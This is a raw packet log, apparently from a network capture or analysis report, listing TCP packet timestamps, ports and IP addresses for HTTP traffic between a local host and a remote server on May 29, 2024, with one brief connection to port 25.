May 29, 2024 14:25:27.839986086 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.839989901 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.840008974 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.840025902 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.840033054 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.840040922 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.840058088 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.840063095 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.840074062 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.840089083 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.840105057 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.840106964 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.840121984 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.840126038 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.840137959 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.840152979 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.840162039 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.840167999 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.840186119 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.840186119 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.840200901 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.840215921 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.840218067 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.840231895 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.840245008 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.840248108 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.840265989 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.840277910 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.840282917 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.840298891 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.840312958 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.840313911 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.840331078 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.840346098 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.840352058 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.840363026 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.840377092 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.840379000 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.840394974 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.840409994 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.840424061 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.840435028 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.840442896 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.840451002 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.840459108 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.840475082 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.840491056 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.840523005 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.840523005 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.840542078 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.840558052 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.840573072 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.840588093 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.840593100 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.840615034 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.909440041 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.911716938 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.911748886 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.911765099 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.911780119 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.911793947 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.911808014 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.911807060 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.911823988 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.911838055 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.911842108 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.911859035 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.911885977 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.940013885 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.007927895 CEST	49761	80	192.168.2.4	199.232.214.172
May 29, 2024 14:25:28.007927895 CEST	49761	80	192.168.2.4	199.232.214.172
May 29, 2024 14:25:28.012984037 CEST	80	49761	199.232.214.172	192.168.2.4
May 29, 2024 14:25:28.013015032 CEST	80	49761	199.232.214.172	192.168.2.4
May 29, 2024 14:25:28.014786005 CEST	49762	25	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.103638887 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.103671074 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.103693008 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.103704929 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.103717089 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.103729963 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.103746891 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.103760958 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.103770971 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.103771925 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.103782892 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.103796959 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.103806973 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.103807926 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.103820086 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.103832006 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.103842974 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.103844881 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.103867054 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.103935957 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.103961945 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.103969097 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.103996038 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.104026079 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.104044914 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.104063988 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.104068995 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.104074955 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.104087114 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.104099989 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.104110956 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.104114056 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.104123116 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.104151964 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.104151964 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.105916023 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.105928898 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.105940104 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.105952024 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.105963945 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.105977058 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.105989933 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.105989933 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.106004000 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.106015921 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.106026888 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.106039047 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.106043100 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.106044054 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.106070995 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.106112957 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.106164932 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.106175900 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.106188059 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.106199980 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.106211901 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.106240988 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.106365919 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.106405973 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.106417894 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.106434107 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.106436968 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.106448889 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.106501102 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.106827021 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.106898069 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.106909037 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.106919050 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.106965065 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.106975079 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.106986046 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.106988907 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.106997967 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.107023001 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.107053041 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.107108116 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.107117891 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.107124090 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.107130051 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.107135057 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.107141018 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.107146025 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.107156038 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.107161045 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.107222080 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.107223034 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.107223034 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.107280970 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.107285023 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.107295036 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.107311964 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.107322931 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.107332945 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.107336044 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.107343912 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.107372046 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.107402086 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.107458115 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.107533932 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.107544899 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.107604980 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.107703924 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.107716084 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.107724905 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.107734919 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.107750893 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.107762098 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.107763052 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.107770920 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.107774973 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.107785940 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.107800007 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.107800961 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.107812881 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.107822895 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.107830048 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.107835054 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.107842922 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.107863903 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.107955933 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.107966900 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.107976913 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.108000994 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.108055115 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.108406067 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.108417034 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.108428001 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.108438969 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.108450890 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.108474016 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.108603001 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.109399080 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.109559059 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.109576941 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.109586954 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.109596968 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.109606981 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.109617949 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.109622955 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.109628916 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.109641075 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.109652042 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.109652042 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.109659910 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.109663963 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.109675884 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.109687090 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.109698057 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.109699965 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.109739065 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.109739065 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.109775066 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.109900951 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.109910965 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.109921932 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.109932899 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.109944105 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.109955072 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.109956026 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.109966040 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.109977961 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.109977961 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.109994888 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.110110998 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.110141039 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.110152006 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.110162973 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.110176086 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.110188007 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.110193968 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.110204935 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.110214949 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.110224009 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.110224009 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.110234976 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.110236883 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.110256910 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.110299110 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.192620039 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.192635059 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.192761898 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.192774057 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.192792892 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.192799091 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.192804098 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.192819118 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.192832947 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.192832947 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.192847013 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.192858934 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.192858934 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.192872047 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.192873001 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.192887068 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.192898035 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.192900896 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.192909002 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.192920923 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.192933083 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.192945004 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.193003893 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.193036079 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.193051100 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.193062067 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.193094969 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.193106890 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.193116903 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.193124056 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.193175077 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.298340082 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.384107113 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.384125948 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.384145021 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.384160995 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.384171963 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.384182930 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.384213924 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.384290934 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.384330988 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.384373903 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.384391069 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.384402037 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.384419918 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.384427071 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.384434938 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.384444952 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.384459972 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.384565115 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.384582996 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.384597063 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.384633064 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.384646893 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.384654999 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.384675026 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.384722948 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.384733915 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.384774923 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.384776115 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.384784937 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.384802103 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.384814024 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.384821892 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.384824038 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.384860992 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.384890079 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.386245966 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.386262894 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.386274099 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.386290073 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.386301994 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.386311054 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.386311054 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.386322975 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.386333942 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.386343956 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.386347055 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.386357069 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.386367083 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.386369944 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.386379957 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.386390924 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.386413097 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.386507988 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.386574030 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.386626005 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.386636019 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.386650085 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.386665106 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.386693954 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.386718035 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.386727095 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.386764050 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.386785984 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.386799097 CEST	80	49760	111.90.158.40	192.168.2.4
